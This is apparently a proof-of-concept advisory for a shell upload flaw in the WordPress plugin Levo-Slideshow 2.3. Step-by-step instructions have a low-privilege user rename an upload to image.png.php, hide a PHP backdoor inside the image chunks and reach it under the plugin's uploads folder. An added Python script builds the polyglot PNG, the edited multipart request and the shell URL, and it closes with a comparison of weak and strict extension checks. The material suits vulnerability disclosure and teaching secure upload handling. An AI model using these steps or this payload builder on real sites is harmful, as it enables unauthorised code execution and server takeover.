WordPress Levo-Slideshow 2.3 Shell Upload via Unprivileged User

Vendor: https://wordpress.org/plugins/wp-levoslideshow
Version: 2.3
Tested on: WordPress 4.5.2

Plugin Description:

WP-Levoslideshow is a WordPress plugin that lets users display multiple slideshow instances in their posts, each with its own categories and images.

PoC ( Proof Of Concept ):

  1. Log in as an unprivileged user, one who does not even have the privilege to upload a plugin.
  2. Go to http://site.com/wp-admin/admin.php?page=levoslideshow_manage
  3. If a gallery already exists you do not need to create one. Go to "Category Management", click "Add New", upload any .png / .jpg image from your PC and intercept the request.
  4. After intercepting the upload request, send it to Repeater. Change the filename to image.png.php and, in the POSTed image data, insert your PHP backdoor between the image chunks so the file still parses as an image. It should look like this: exploit_levo.png
  5. Forward the request and browse to site.com/wp-content/uploads/levoslideshow/[ALBUM_NUMBER]_uploadfolder/big/[YourShell] to reach your shell.

    That's it, you are done.
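The following is an added example, not code from the original post or from the plugin. It reproduces the PoC offline so the moving parts can be inspected: a PNG that stays a valid image but carries PHP in a tEXt chunk between IHDR and IDAT (the "between image chunks" step), the multipart body with the filename changed to image.png.php, the upload path from step 5, and, for comparison, the server-side check that would have stopped it next to an extension-substring check that lets it through. The form field name "image", the boundary string and the weak check are assumptions for illustration; the plugin's real code is not on the page. A harmless echo marker stands in for the backdoor.

```python
"""Added example (not the original post's or the plugin's code)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Harmless marker in place of a real backdoor; use only in an authorised test.
PHP_MARKER = b"<?php echo 'levo-poc'; ?>"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_polyglot_png(php: bytes = PHP_MARKER) -> bytes:
    """1x1 RGB PNG with the PHP payload in a tEXt chunk between IHDR and IDAT.
    Image decoders ignore tEXt; PHP ignores everything outside <?php ... ?>."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00" + b"\xff\x00\x00")        # filter byte + one red pixel
    text = b"Comment\x00" + php                            # keyword, NUL, text
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def png_chunks(data: bytes) -> list[tuple[bytes, bytes]]:
    """Walk the chunk list, verifying each CRC, to confirm the polyglot is still a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, out = len(PNG_SIG), []
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        out.append((ctype, body))
        pos += 12 + length
    return out


def build_multipart(field: str, filename: str, content: bytes, boundary: str = "levoPoC") -> bytes:
    """The request body as it looks after editing the filename in Repeater.
    Field name and boundary are assumptions; take the real ones from the intercepted request."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: image/png\r\n\r\n")
    return head.encode() + content + f"\r\n--{boundary}--\r\n".encode()


def shell_url(base: str, album: int, filename: str) -> str:
    """Where step 5 of the PoC says the uploaded file lands."""
    return f"{base}/wp-content/uploads/levoslideshow/{album}_uploadfolder/big/{filename}"


ALLOWED = {"png", "jpg", "jpeg", "gif"}
MAGIC = {"png": PNG_SIG, "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}


def weak_check(filename: str) -> bool:
    """Illustrative weak check (an assumption, not the plugin's code):
    accepts any name containing an image extension anywhere, so image.png.php passes."""
    return any(f".{ext}" in filename.lower() for ext in ALLOWED)


def strict_check(filename: str, content: bytes) -> bool:
    """Only the LAST extension decides how the web server handles the file, so that is
    what must be allow-listed, and the leading bytes must match it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED and content.startswith(MAGIC[ext])


if __name__ == "__main__":
    poly = build_polyglot_png()
    print([t for t, _ in png_chunks(poly)])
    print("weak accepts image.png.php:", weak_check("image.png.php"))
    print("strict accepts image.png.php:", strict_check("image.png.php", poly))
    print(shell_url("http://site.com", 1, "image.png.php"))
```

Two things the run makes visible. The polyglot passes the strict check when named image.png, because it genuinely is a PNG; content sniffing alone does not catch it, and does not need to, since a file saved with a .png extension is never handed to the PHP interpreter. What matters is the final extension of the stored name, which is exactly what the rename to image.png.php exploits, so the fix is to allow-list that last extension (or rename the file server-side) rather than to search the name for an image extension.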

